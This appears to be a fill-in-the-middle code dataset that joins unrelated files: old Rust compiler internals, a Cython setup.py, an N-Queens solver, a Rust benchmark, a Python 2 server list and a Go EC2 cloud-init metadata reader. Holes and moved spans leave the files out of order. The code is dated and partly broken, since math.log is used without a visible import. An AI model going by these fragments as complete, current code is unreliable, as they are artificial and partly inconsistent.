0; while i < variants.len() { let variant = *variants.get(i); if variant.id == variant_id { return variant } i += 1; } cx.sess.bug("enum_variant_with_id(): no variant exists with that ID"); } // If the given item is in an external crate, looks up its type and adds it to // the type cache. Returns the type parameters and type. pub fn lookup_item_type(cx: &ctxt, did: ast::DefId) -> ty_param_bounds_and_ty { lookup_locally_or_in_crate_store( "tcache", did, &mut *cx.tcache.borrow_mut(), || csearch::get_type(cx, did)) } pub fn lookup_impl_vtables(cx: &ctxt, did: ast::DefId) -> typeck::impl_res { lookup_locally_or_in_crate_store( "impl_vtables", did, &mut *cx.impl_vtables.borrow_mut(), || csearch::get_impl_vtables(cx, did) ) } /// Given the did of a trait, returns its canonical trait ref. pub fn lookup_trait_def(cx: &ctxt, did: ast::DefId) -> @ty::TraitDef { let mut trait_defs = cx.trait_defs.borrow_mut(); match trait_defs.find(&did) { Some(&trait_def) => { // The item is in this crate. The caller should have added it to the // type cache already return trait_def; } None => { assert!(did.krate != ast::LOCAL_CRATE); let trait_def = @csearch::get_trait_def(cx, did); trait_defs.insert(did, trait_def); return trait_def; } } } /// Iterate over meta_items of a definition. // (This should really be an iterator, but that would require csearch and // decoder to use iterators instead of higher-order functions.) pub fn each_attr(tcx: &ctxt, did: DefId, f: |@MetaItem| -> bool) -> bool { if is_local(did) { let item = tcx.map.expect_item(did.node); item.attrs.iter().advance(|attr| f(attr.node.value)) } else { let mut cont = true; csearch::get_item_attrs(&tcx.sess.cstore, did, |meta_items| { if cont { cont = meta_items.iter().advance(|ptrptr| f(*ptrptr)); } }); cont } } /// Determine whether an item is annotated with an attribute pub fn has_attr(tcx: &ctxt, did: DefId, attr: &str) -> bool { let mut found = false; each_attr(tcx, did, |item| { if item.name().equiv(&attr) { found = true; false } else { true } }); found } /// Determine whether an item is annotated with `#[packed]` pub fn lookup_packed(tcx: &ctxt, did: DefId) -> bool { has_attr(tcx, did, "packed") } /// Determine whether an item is annotated with `#[simd]` pub fn lookup_simd(tcx: &ctxt, did: DefId) -> bool { has_attr(tcx, did, "simd") } // Obtain the representation annotation for a definition. pub fn lookup_repr_hint(tcx: &ctxt, did: DefId) -> attr::ReprAttr { let mut acc = attr::ReprAny; ty::each_attr(tcx, did, |meta| { acc = attr::find_repr_attr(tcx.sess.diagnostic(), meta, acc); true }); return acc; } // Look up a field ID, whether or not it's local // Takes a list of type substs in case the struct is generic pub fn lookup_field_type(tcx: &ctxt, struct_id: DefId, id: DefId, substs: &substs) -> ty::t { let t = if id.krate == ast::LOCAL_CRATE { node_id_to_type(tcx, id.node) } else { let mut tcache = tcx.tcache.borrow_mut(); match tcache.find(&id) { Some(&ty_param_bounds_and_ty {ty, ..}) => ty, None => { let tpt = csearch::get_field_type(tcx, struct_id, id); tcache.insert(id, tpt.clone()); tpt.ty } } }; subst(tcx, substs, t) } // Look up the list of field names and IDs for a given struct // Fails if the id is not bound to a struct. pub fn lookup_struct_fields(cx: &ctxt, did: ast::DefId) -> Vec<field_ty> { if did.krate == ast::LOCAL_CRATE { match cx.map.find(did.node) { Some(ast_map::NodeItem(i)) => { match i.node { ast::ItemStruct(struct_def, _) => { struct_field_tys(struct_def.fields.as_slice()) } _ => cx.sess.bug("struct ID bound to non-struct") } } Some(ast_map::NodeVariant(ref variant)) => { match (*variant).node.kind { ast::StructVariantKind(struct_def) => { struct_field_tys(struct_def.fields.as_slice()) } _ => { cx.sess.bug("struct ID bound to enum variant that \ isn't struct-like") } } } _ => { cx.sess.bug( format!("struct ID not bound to an item: {}", cx.map.node_to_str(did.node))); } } } else { csearch::get_struct_fields(&cx.sess.cstore, did) } } pub fn lookup_struct_field(cx: &ctxt, parent: ast::DefId, field_id: ast::DefId) -> field_ty { let r = lookup_struct_fields(cx, parent); match r.iter().find( |f| f.id.node == field_id.node) { Some(t) => *t, None => cx.sess.bug("struct ID not found in parent's fields") } } fn struct_field_tys(fields: &[StructField]) -> Vec<field_ty> { fields.iter().map(|field| { match field.node.kind { NamedField(ident, visibility) => { field_ty { name: ident.name, id: ast_util::local_def(field.node.id), vis: visibility, } } UnnamedField(visibility) => { field_ty { name: syntax::parse::token::special_idents::unnamed_field.name, id: ast_util::local_def(field.node.id), vis: visibility, } } } }).collect() } // Returns a list of fields corresponding to the struct's items. trans uses // this. Takes a list of substs with which to instantiate field types. pub fn struct_fields(cx: &ctxt, did: ast::DefId, substs: &substs) -> Vec<field> { lookup_struct_fields(cx, did).iter().map(|f| { field { // FIXME #6993: change type of field to Name and get rid of new() ident: ast::Ident::new(f.name), mt: mt { ty: lookup_field_type(cx, did, f.id, substs), mutbl: MutImmutable } } }).collect() } pub fn is_binopable(cx: &ctxt, ty: t, op: ast::BinOp) -> bool { static tycat_other: int = 0; static tycat_bool: int = 1; static tycat_char: int = 2; static tycat_int: int = 3; static tycat_float: int = 4; static tycat_bot: int = 5; static tycat_raw_ptr: int = 6; static opcat_add: int = 0; static opcat_sub: int = 1; static opcat_mult: int = 2; static opcat_shift: int = 3; static opcat_rel: int = 4; static opcat_eq: int = 5; static opcat_bit: int = 6; static opcat_logic: int = 7; fn opcat(op: ast::BinOp) -> int { match op { ast::BiAdd => opcat_add, ast::BiSub => opcat_sub, ast::BiMul => opcat_mult, ast::BiDiv => opcat_mult, ast::BiRem => opcat_mult, ast::BiAnd => opcat_logic, ast::BiOr => opcat_logic, ast::BiBitXor => opcat_bit, ast::BiBitAnd => opcat_bit, ast::BiBitOr => opcat_bit, ast::BiShl => opcat_shift, ast::BiShr => opcat_shift, ast::BiEq => opcat_eq, ast::BiNe => opcat_eq, ast::BiLt => opcat_rel, ast::BiLe => opcat_rel, ast::BiGe => opcat_rel, ast::BiGt => opcat_rel } } fn tycat(cx: &ctxt, ty: t) -> int { if type_is_simd(cx, ty) { return tycat(cx, simd_type(cx, ty)) } match get(ty).sty { ty_char => tycat_char, ty_bool => tycat_bool, ty_int(_) | ty_uint(_) | ty_infer(IntVar(_)) => tycat_int, ty_float(_) | ty_infer(FloatVar(_)) => tycat_float, ty_bot => tycat_bot, ty_ptr(_) => tycat_raw_ptr, _ => tycat_other } } static t: bool = true; static f: bool = false; let tbl = [ // +, -, *, shift, rel, ==, bit, logic /*other*/ [f, f, f, f, f, f, f, f], /*bool*/ [f, f, f, f, t, t, t, t], /*char*/ [f, f, f, f, t, t, f, f], /*int*/ [t, t, t, t, t, t, t, f], /*float*/ [t, t, t, f, t, t, f, f], /*bot*/ [t, t, t, t, t, t, t, t], /*raw ptr*/ [f, f, f, f, t, t, f, f]]; return tbl[tycat(cx, ty)][opcat(op)]; } pub fn ty_params_to_tys(tcx: &ctxt, generics: &ast::Generics) -> Vec<t> { Vec::from_fn(generics.ty_params.len(), |i| { let id = generics.ty_params.get(i).id; ty::mk_param(tcx, i, ast_util::local_def(id)) }) } /// Returns an equivalent type with all the typedefs and self regions removed. pub fn normalize_ty(cx: &ctxt, t: t) -> t { let u = TypeNormalizer(cx).fold_ty(t); return u; struct TypeNormalizer<'a>(&'a ctxt); impl<'a> TypeFolder for TypeNormalizer<'a> { fn tcx<'a>(&'a self) -> &'a ctxt { let TypeNormalizer(c) = *self; c } fn fold_ty(&mut self, t: ty::t) -> ty::t { match self.tcx().normalized_cache.borrow().find_copy(&t) { None => {} Some(u) => return u } let t_norm = ty_fold::super_fold_ty(self, t); self.tcx().normalized_cache.borrow_mut().insert(t, t_norm); return t_norm; } fn fold_vstore(&mut self, vstore: vstore) -> vstore { match vstore { vstore_fixed(..) | vstore_uniq => vstore, vstore_slice(_) => vstore_slice(ReStatic) } } fn fold_region(&mut self, _: ty::Region) -> ty::Region { ty::ReStatic } fn fold_substs(&mut self, substs: &substs) -> substs { substs { regions: ErasedRegions, self_ty: ty_fold::fold_opt_ty(self, substs.self_ty), tps: ty_fold::fold_ty_vec(self, substs.tps.as_slice()) } } fn fold_sig(&mut self, sig: &ty::FnSig) -> ty::FnSig { // The binder-id is only relevant to bound regions, which // are erased at trans time. ty::FnSig { binder_id: ast::DUMMY_NODE_ID, inputs: ty_fold::fold_ty_vec(self, sig.inputs.as_slice()), output: self.fold_ty(sig.output), variadic: sig.variadic, } } } } pub trait ExprTyProvider { fn expr_ty(&self, ex: &ast::Expr) -> t; fn ty_ctxt<'a>(&'a self) -> &'a ctxt; } impl ExprTyProvider for ctxt { fn expr_ty(&self, ex: &ast::Expr) -> t { expr_ty(self, ex) } fn ty_ctxt<'a>(&'a self) -> &'a ctxt { self } } // Returns the repeat count for a repeating vector expression. pub fn eval_repeat_count<T: ExprTyProvider>(tcx: &T, count_expr: &ast::Expr) -> uint { match const_eval::eval_const_expr_partial(tcx, count_expr) { Ok(ref const_val) => match *const_val { const_eval::const_int(count) => if count < 0 { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found negative integer"); return 0; } else { return count as uint }, const_eval::const_uint(count) => return count as uint, const_eval::const_float(count) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found float"); return count as uint; } const_eval::const_str(_) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found string"); return 0; } const_eval::const_bool(_) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found boolean"); return 0; } const_eval::const_binary(_) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected positive integer for \ repeat count but found binary array"); return 0; } }, Err(..) => { tcx.ty_ctxt().sess.span_err(count_expr.span, "expected constant integer for repeat count \ but found variable"); return 0; } } } // Determine what purity to check a nested function under pub fn determine_inherited_purity(parent: (ast::Purity, ast::NodeId), child: (ast::Purity, ast::NodeId), child_sigil: ast::Sigil) -> (ast::Purity, ast::NodeId) { // If the closure is a stack closure and hasn't had some non-standard // purity inferred for it, then check it under its parent's purity. // Otherwise, use its own match child_sigil { ast::BorrowedSigil if child.val0() == ast::ImpureFn => parent, _ => child } } // Iterate over a type parameter's bounded traits and any supertraits // of those traits, ignoring kinds. // Here, the supertraits are the transitive closure of the supertrait // relation on the supertraits from each bounded trait's constraint // list. pub fn each_bound_trait_and_supertraits(tcx: &ctxt, bounds: &[@TraitRef], f: |@TraitRef| -> bool) -> bool { for &bound_trait_ref in bounds.iter() { let mut supertrait_set = HashMap::new(); let mut trait_refs = Vec::new(); let mut i = 0; // Seed the worklist with the trait from the bound supertrait_set.insert(bound_trait_ref.def_id, ()); trait_refs.push(bound_trait_ref); // Add the given trait ty to the hash map while i < trait_refs.len() { debug!("each_bound_trait_and_supertraits(i={:?}, trait_ref={})", i, trait_refs.get(i).repr(tcx)); if !f(*trait_refs.get(i)) { return false; } // Add supertraits to supertrait_set let supertrait_refs = trait_ref_supertraits(tcx, *trait_refs.get(i)); for &supertrait_ref in supertrait_refs.iter() { debug!("each_bound_trait_and_supertraits(supertrait_ref={})", supertrait_ref.repr(tcx)); let d_id = supertrait_ref.def_id; if !supertrait_set.contains_key(&d_id) { // FIXME(#5527) Could have same trait multiple times supertrait_set.insert(d_id, ()); trait_refs.push(supertrait_ref); } } i += 1; } } return true; } pub fn count_traits_and_supertraits(tcx: &ctxt, type_param_defs: &[TypeParameterDef]) -> uint { let mut total = 0; for type_param_def in type_param_defs.iter() { each_bound_trait_and_supertraits( tcx, type_param_def.bounds.trait_bounds.as_slice(), |_| { total += 1; true }); } return total; } pub fn get_tydesc_ty(tcx: &ctxt) -> Result<t, ~str> { tcx.lang_items.require(TyDescStructLangItem).map(|tydesc_lang_item| { tcx.intrinsic_defs.borrow().find_copy(&tydesc_lang_item) .expect("Failed to resolve TyDesc") }) } pub fn get_opaque_ty(tcx: &ctxt) -> Result<t, ~str> { tcx.lang_items.require(OpaqueStructLangItem).map(|opaque_lang_item| { tcx.intrinsic_defs.borrow().find_copy(&opaque_lang_item) .expect("Failed to resolve Opaque") }) } pub fn visitor_object_ty(tcx: &ctxt, region: ty::Region) -> Result<(@TraitRef, t), ~str> { let trait_lang_item = match tcx.lang_items.require(TyVisitorTraitLangItem) { Ok(id) => id, Err(s) => { return Err(s); } }; let substs = substs { regions: ty::NonerasedRegions(OwnedSlice::empty()), self_ty: None, tps: Vec::new() }; let trait_ref = @TraitRef { def_id: trait_lang_item, substs: substs }; Ok((trait_ref, mk_trait(tcx, trait_ref.def_id, trait_ref.substs.clone(), RegionTraitStore(region), ast::MutMutable, EmptyBuiltinBounds()))) } pub fn item_variances(tcx: &ctxt, item_id: ast::DefId) -> @ItemVariances { lookup_locally_or_in_crate_store( "item_variance_map", item_id, &mut *tcx.item_variance_map.borrow_mut(), || @csearch::get_item_variances(&tcx.sess.cstore, item_id)) } /// Records a trait-to-implementation mapping. fn record_trait_implementation(tcx: &ctxt, trait_def_id: DefId, implementation: @Impl) { let implementation_list; let mut trait_impls = tcx.trait_impls.borrow_mut(); match trait_impls.find(&trait_def_id) { None => { implementation_list = @RefCell::new(Vec::new()); trait_impls.insert(trait_def_id, implementation_list); } Some(&existing_implementation_list) => { implementation_list = existing_implementation_list } } implementation_list.borrow_mut().push(implementation); } /// Populates the type context with all the implementations for the given type /// if necessary. pub fn populate_implementations_for_type_if_necessary(tcx: &ctxt, type_id: ast::DefId) { if type_id.krate == LOCAL_CRATE { return } if tcx.populated_external_types.borrow().contains(&type_id) { return } csearch::each_implementation_for_type(&tcx.sess.cstore, type_id, |implementation_def_id| { let implementation = @csearch::get_impl(tcx, implementation_def_id); // Record the trait->implementation mappings, if applicable. let associated_traits = csearch::get_impl_trait(tcx, implementation.did); for trait_ref in associated_traits.iter() { record_trait_implementation(tcx, trait_ref.def_id, implementation); } // For any methods that use a default implementation, add them to // the map. This is a bit unfortunate. for method in implementation.methods.iter() { for source in method.provided_source.iter() { tcx.provided_method_sources.borrow_mut() .insert(method.def_id, *source); } } // If this is an inherent implementation, record it. if associated_traits.is_none() { let implementation_list; let mut inherent_impls = tcx.inherent_impls.borrow_mut(); match inherent_impls.find(&type_id) { None => { implementation_list = @RefCell::new(Vec::new()); inherent_impls.insert(type_id, implementation_list); } Some(&existing_implementation_list) => { implementation_list = existing_implementation_list; } } implementation_list.borrow_mut().push(implementation); } // Store the implementation info. tcx.impls.borrow_mut().insert(implementation_def_id, implementation); }); tcx.populated_external_types.borrow_mut().insert(type_id); } /// Populates the type context with all the implementations for the given /// trait if necessary. pub fn populate_implementations_for_trait_if_necessary( tcx: &ctxt, trait_id: ast::DefId) { if trait_id.krate == LOCAL_CRATE { return } if tcx.populated_external_traits.borrow().contains(&trait_id) { return } csearch::each_implementation_for_trait(&tcx.sess.cstore, trait_id, |implementation_def_id| { let implementation = @csearch::get_impl(tcx, implementation_def_id); // Record the trait->implementation mapping. record_trait_implementation(tcx, trait_id, implementation); // For any methods that use a default implementation, add them to // the map. This is a bit unfortunate. for method in implementation.methods.iter() { for source in method.provided_source.iter() { tcx.provided_method_sources.borrow_mut() .insert(method.def_id, *source); } } // Store the implementation info. tcx.impls.borrow_mut().insert(implementation_def_id, implementation); }); tcx.populated_external_traits.borrow_mut().insert(trait_id); } /// Given the def_id of an impl, return the def_id of the trait it implements. /// If it implements no trait, return `None`. pub fn trait_id_of_impl(tcx: &ctxt, def_id: ast::DefId) -> Option<ast::DefId> { let node = match tcx.map.find(def_id.node) { Some(node) => node, None => return None }; match node { ast_map::NodeItem(item) => { match item.node { ast::ItemImpl(_, Some(ref trait_ref), _, _) => { Some(node_id_to_trait_ref(tcx, trait_ref.ref_id).def_id) } _ => None } } _ => None } } /// If the given def ID describes a method belonging to a trait (either a /// default method or an implementation of a trait method), return the ID of /// the trait that the method belongs to. Otherwise, return `None`. pub fn trait_of_method(tcx: &ctxt, def_id: ast::DefId) -> Option<ast::DefId> { if def_id.krate != LOCAL_CRATE { return csearch::get_trait_of_method(&tcx.sess.cstore, def_id, tcx); } match tcx.methods.borrow().find(&def_id).map(|m| *m) { Some(method) => { match method.container { TraitContainer(def_id) => Some(def_id), ImplContainer(def_id) => trait_id_of_impl(tcx, def_id), } } None => None } } /// If the given def ID describes a method belonging to a trait, (either a /// default method or an implementation of a trait method), return the ID of /// the method inside trait definition (this means that if the given def ID /// is already that of the original trait method, then the return value is /// the same). /// Otherwise, return `None`. pub fn trait_method_of_method(tcx: &ctxt, def_id: ast::DefId) -> Option<ast::DefId> { let method = match tcx.methods.borrow().find(&def_id) { Some(&m) => m, None => return None, }; let name = method.ident.name; match trait_of_method(tcx, def_id) { Some(trait_did) => { let trait_methods = ty::trait_methods(tcx, trait_did); trait_methods.iter() .position(|m| m.ident.name == name) .map(|idx| ty::trait_method(tcx, trait_did, idx).def_id) } None => None } } /// Creates a hash of the type `t` which will be the same no matter what crate /// context it's calculated within. This is used by the `type_id` intrinsic. pub fn hash_crate_independent(tcx: &ctxt, t: t, svh: &Svh) -> u64 { let mut state = sip::SipState::new(); macro_rules! byte( ($b:expr) => { ($b as u8).hash(&mut state) } ); macro_rules! hash( ($e:expr) => { $e.hash(&mut state) } ); let region = |_state: &mut sip::SipState, r: Region| { match r { ReStatic => {} ReEmpty | ReEarlyBound(..) | ReLateBound(..) | ReFree(..) | ReScope(..) | ReInfer(..) => { tcx.sess.bug("non-static region found when hashing a type") } } }; let vstore = |state: &mut sip::SipState, v: vstore| { match v { vstore_fixed(_) => 0u8.hash(state), vstore_uniq => 1u8.hash(state), vstore_slice(r) => { 2u8.hash(state); region(state, r); } } }; let did = |state: &mut sip::SipState, did: DefId| { let h = if ast_util::is_local(did) { svh.clone() } else { tcx.sess.cstore.get_crate_hash(did.krate) }; h.as_str().hash(state); did.node.hash(state); }; let mt = |state: &mut sip::SipState, mt: mt| { mt.mutbl.hash(state); }; ty::walk_ty(t, |t| { match ty::get(t).sty { ty_nil => byte!(0), ty_bot => byte!(1), ty_bool => byte!(2), ty_char => byte!(3), ty_int(i) => { byte!(4); hash!(i); } ty_uint(u) => { byte!(5); hash!(u); } ty_float(f) => { byte!(6); hash!(f); } ty_str(v) => { byte!(7); hash!(v); } ty_enum(d, _) => { byte!(8); hash!(d) } ty_box(_) => { byte!(9); } ty_uniq(_) => { byte!(10); } ty_vec(m, v) => { byte!(11); mt(&mut state, m); vstore(&mut state, v); } ty_ptr(m) => { byte!(12); mt(&mut state, m); } ty_rptr(r, m) => { byte!(13); region(&mut state, r); mt(&mut state, m); } ty_bare_fn(ref b) => { byte!(14); hash!(b.purity); hash!(b.abis); } ty_closure(ref c) => { byte!(15); hash!(c.purity); hash!(c.sigil); hash!(c.onceness); hash!(c.bounds); region(&mut state, c.region); } ty_trait(~ty::TyTrait { def_id: d, store, mutability: m, bounds, .. }) => { byte!(17); did(&mut state, d); match store { UniqTraitStore => byte!(0), RegionTraitStore(r) => { byte!(1) region(&mut state, r); } } hash!(m); hash!(bounds); } ty_struct(d, _) => { byte!(18); did(&mut state, d); } ty_tup(ref inner) => { byte!(19); hash!(inner.len()); } ty_param(p) => { byte!(20); hash!(p.idx); did(&mut state, p.def_id); } ty_self(d) => { byte!(21); did(&mut state, d); } ty_infer(_) => unreachable!(), ty_err => byte!(23), ty_unboxed_vec(m) => { byte!(24); mt(&mut state, m); } } }); state.result() } impl Variance { pub fn to_str(self) -> &'static str { match self { Covariant => "+", Contravariant => "-", Invariant => "o", Bivariant => "*", } } } pub fn construct_parameter_environment( tcx: &ctxt, self_bound: Option<@TraitRef>, item_type_params: &[TypeParameterDef], method_type_params: &[TypeParameterDef], item_region_params: &[RegionParameterDef], method_region_params: &[RegionParameterDef], free_id: ast::NodeId) -> ParameterEnvironment { /*! See `ParameterEnvironment` struct def'n for details */ // // Construct the free substs. // // map Self => Self let self_ty = self_bound.map(|t| ty::mk_self(tcx, t.def_id)); // map A => A let num_item_type_params = item_type_params.len(); let num_method_type_params = method_type_params.len(); let num_type_params = num_item_type_params + num_method_type_params; let type_params = Vec::from_fn(num_type_params, |i| { let def_id = if i < num_item_type_params { item_type_params[i].def_id } else { method_type_params[i - num_item_type_params].def_id }; ty::mk_param(tcx, i, def_id) }); // map bound 'a => free 'a let region_params = { fn push_region_params(mut accum: Vec<ty::Region>, free_id: ast::NodeId, region_params: &[RegionParameterDef]) -> Vec<ty::Region> { for r in region_params.iter() { accum.push( ty::ReFree(ty::FreeRegion { scope_id: free_id, bound_region: ty::BrNamed(r.def_id, r.name)})); } accum } let t = push_region_params(vec!(), free_id, item_region_params); push_region_params(t, free_id, method_region_params) }; let free_substs = substs { self_ty: self_ty, tps: type_params, regions: ty::NonerasedRegions(OwnedSlice::from_vec(region_params)) }; // // Compute the bounds on Self and the type parameters. // let self_bound_substd = self_bound.map(|b| b.subst(tcx, &free_substs)); let type_param_bounds_substd = Vec::from_fn(num_type_params, |i| { if i < num_item_type_params { (*item_type_params[i].bounds).subst(tcx, &free_substs) } else { let j = i - num_item_type_params; (*method_type_params[j].bounds).subst(tcx, &free_substs) } }); debug!("construct_parameter_environment: free_id={} \ free_subst={} \ self_param_bound={} \ type_param_bound={}", free_id, free_substs.repr(tcx), self_bound_substd.repr(tcx), type_param_bounds_substd.repr(tcx)); ty::ParameterEnvironment { free_substs: free_substs, self_param_bound: self_bound_substd, type_param_bounds: type_param_bounds_substd, } } impl substs { pub fn empty() -> substs { substs { self_ty: None, tps: Vec::new(), regions: NonerasedRegions(OwnedSlice::empty()) } } } impl BorrowKind { pub fn from_mutbl(m: ast::Mutability) -> BorrowKind { match m { ast::MutMutable => MutBorrow, ast::MutImmutable => ImmBorrow, } } pub fn to_user_str(&self) -> &'static str { match *self { MutBorrow => "mutable", ImmBorrow => "immutable", UniqueImmBorrow => "uniquely immutable", } } pub fn to_short_str(&self) -> &'static str { match *self { MutBorrow => "mut", ImmBorrow => "imm", UniqueImmBorrow => "own", } } }<|fim▁end|>
enum_variants(cx, id).iter().map(|variant_info| { let substd_args = variant_info.args.iter()
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from distutils.core import setup from distutils.extension import Extension from Cython.Distutils import build_ext setup( cmdclass = {'build_ext' : build_ext}, ext_modules=[Extension("_snaphu", sources=["_snaphu.pyx", "../src/snaphu.c", "../src/snaphu_solver.c", "../src/snaphu_util.c", "../src/snaphu_cost.c", "../src/snaphu_cs2.c", "../src/snaphu_io.c", "../src/snaphu_tile.c"],<|fim▁hole|> include_dirs=['../src'], extra_compile_args=['-Wstrict-prototypes', ], language="c")] )<|fim▁end|>
<|file_name|>n_queens.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # encoding: utf-8 """ n_queens.py Created by Shengwei on 2014-07-23. """ # https://oj.leetcode.com/problems/n-queens/ # tags: medim / hard, matrix, bit manipulation, generator, dfs, edge cases, bitmap """ The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other. Given an integer n, return all distinct solutions to the n-queens puzzle. Each solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively. For example, There exist two distinct solutions to the 4-queens puzzle: [ [".Q..", // Solution 1 "...Q", "Q...", "..Q."], ["..Q.", // Solution 2 "Q...", "...Q", ".Q.."] ] """ # https://oj.leetcode.com/discuss/3861/solved-with-backtracing # https://oj.leetcode.com/discuss/743/whats-your-solution class Solution: # @return a list of lists of string def solveNQueens(self, n): positions = (1 << n) - 1 def search(board, depth, vertical_taken, left_taken, right_taken): if depth == 0: yield board return line = ['.'] * n # it must be & with positions, otherwise it's a negative number # with all 1's extending to the leftmost bit availables = positions & ~(vertical_taken | left_taken | right_taken) # loop through all the availables at this depth while availables: pos = availables & (-availables) # get the rightmost bit that is 1<|fim▁hole|> line[index] = 'Q' for each in search( board + [''.join(line)], depth - 1, vertical_taken + pos, left_taken + pos << 1, right_taken + pos >> 1): yield each line[index] = '.' return list(search([], n, 0, 0, 0))<|fim▁end|>
availables -= pos # remove current pos from availables index = int(math.log(pos, 2)) # comput the index where to put queen # note: remember the recursive call is an iterater and yield again
<|file_name|>verify_numbers.rs<|end_file_name|><|fim▁begin|>#![feature(test)] extern crate mynumber; extern crate test; #[bench] fn bench_verify_individual_number(b: &mut test::Bencher) { b.iter(|| { let number = "123456789018"; assert!(mynumber::individual::verify(number).is_ok());<|fim▁hole|> #[bench] fn bench_verify_corporate_number(b: &mut test::Bencher) { b.iter(|| { let number = "9234567890123"; assert!(mynumber::corporate::verify(number).is_ok()); }); }<|fim▁end|>
}); }
<|file_name|>serverList.py<|end_file_name|><|fim▁begin|>#| This file is part of pyCAF. | #| | #| pyCAF is free software: you can redistribute it and/or modify | #| it under the terms of the GNU General Public License as published by | #| the Free Software Foundation, either version 3 of the License, or | #| (at your option) any later version. | #| | #| pyCAF is distributed in the hope that it will be useful, | #| but WITHOUT ANY WARRANTY; without even the implied warranty of | #| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | #| GNU General Public License for more details. | #| | #| You should have received a copy of the GNU General Public License | #| along with this program. If not, see <http://www.gnu.org/licenses/>. | # -*- coding: utf-8 -*- class ServerList(): """ Class wich create a list of server This class uses a dictionnary and a ident number is given at each server added. User can get a server with printing the list and pick up the ident value. Example : >>print myServerList ServerAlpha Id : 1 ServerBeta Id : 2 >>s = myServerList.get_server(2) >>print s.name ServerBeta """ def __init__(self): self.dict = {} self.counter=0 def add_server(self, server): """ Add a server at the server dictionnary Dictionnary model : [counter,server] @param server : the server to store """ self.counter += 1 self.dict[self.counter]=server def get_server(self, ident): """ Return a server corresponding to the ident value @param ident : the number corresponding to the server """ if ident in self.dict.keys(): return self.dict[ident] else: print "Server not found" def __str__(self): """ Print the list of server with their ident value<|fim▁hole|> print "{}".format(server), print identityNb return ""<|fim▁end|>
""" # print self.label_interface_list() for identityNb, server in self.dict.items():
<|file_name|>metadata.go<|end_file_name|><|fim▁begin|>// Copyright 2015 CoreOS, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package ec2 import ( "bufio" "bytes" "fmt" "log" "net" "strings" "github.com/rancher/os/netconf" "github.com/rancher/os/config/cloudinit/datasource" "github.com/rancher/os/config/cloudinit/datasource/metadata" "github.com/rancher/os/config/cloudinit/pkg" ) const ( DefaultAddress = "http://169.254.169.254/" apiVersion = "latest/" userdataPath = apiVersion + "user-data/" metadataPath = apiVersion + "meta-data/" ) type MetadataService struct { metadata.Service } func NewDatasource(root string) *MetadataService { if root == "" { root = DefaultAddress } return &MetadataService{metadata.NewDatasource(root, apiVersion, userdataPath, metadataPath, nil)} } func (ms MetadataService) AvailabilityChanges() bool { // TODO: if it can't find the network, maybe we can start it? return false } func (ms MetadataService) FetchMetadata() (datasource.Metadata, error) { // see http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html metadata := datasource.Metadata{} metadata.NetworkConfig = netconf.NetworkConfig{} if keynames, err := ms.fetchAttributes("public-keys"); err == nil { keyIDs := make(map[string]string) for _, keyname := range keynames { tokens := strings.SplitN(keyname, "=", 2) if len(tokens) != 2 { return metadata, fmt.Errorf("malformed public key: %q", keyname) } keyIDs[tokens[1]] = tokens[0] } metadata.SSHPublicKeys = map[string]string{} for name, id := range keyIDs { sshkey, err := ms.fetchAttribute(fmt.Sprintf("public-keys/%s/openssh-key", id)) if err != nil { return metadata, err } metadata.SSHPublicKeys[name] = sshkey log.Printf("Found SSH key for %q\n", name) } } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } if hostname, err := ms.fetchAttribute("hostname"); err == nil { metadata.Hostname = strings.Split(hostname, " ")[0] } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } // TODO: these are only on the first interface - it looks like you can have as many as you need... if localAddr, err := ms.fetchAttribute("local-ipv4"); err == nil { metadata.PrivateIPv4 = net.ParseIP(localAddr) } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } if publicAddr, err := ms.fetchAttribute("public-ipv4"); err == nil { metadata.PublicIPv4 = net.ParseIP(publicAddr) } else if _, ok := err.(pkg.ErrNotFound); !ok { return metadata, err } metadata.NetworkConfig.Interfaces = make(map[string]netconf.InterfaceConfig) if macs, err := ms.fetchAttributes("network/interfaces/macs"); err != nil { for _, mac := range macs { if deviceNumber, err := ms.fetchAttribute(fmt.Sprintf("network/interfaces/macs/%s/device-number", mac)); err != nil { network := netconf.InterfaceConfig{ DHCP: true, } /* Looks like we must use DHCP for aws // private ipv4 if subnetCidrBlock, err := ms.fetchAttribute(fmt.Sprintf("network/interfaces/macs/%s/subnet-ipv4-cidr-block", mac)); err != nil { cidr := strings.Split(subnetCidrBlock, "/") if localAddr, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/local-ipv4s", mac)); err != nil { for _, addr := range localAddr { network.Addresses = append(network.Addresses, addr+"/"+cidr[1]) } } } // ipv6 if localAddr, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/ipv6s", mac)); err != nil { if subnetCidrBlock, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/subnet-ipv6-cidr-block", mac)); err != nil { for i, addr := range localAddr { cidr := strings.Split(subnetCidrBlock[i], "/") network.Addresses = append(network.Addresses, addr+"/"+cidr[1]) } } } */ // disabled - it looks to me like you don't actually put the public IP on the eth device /* if publicAddr, err := ms.fetchAttributes(fmt.Sprintf("network/interfaces/macs/%s/public-ipv4s", mac)); err != nil { if vpcCidrBlock, err := ms.fetchAttribute(fmt.Sprintf("network/interfaces/macs/%s/vpc-ipv4-cidr-block", mac)); err != nil { cidr := strings.Split(vpcCidrBlock, "/") network.Addresses = append(network.Addresses, publicAddr+"/"+cidr[1]) } } */ 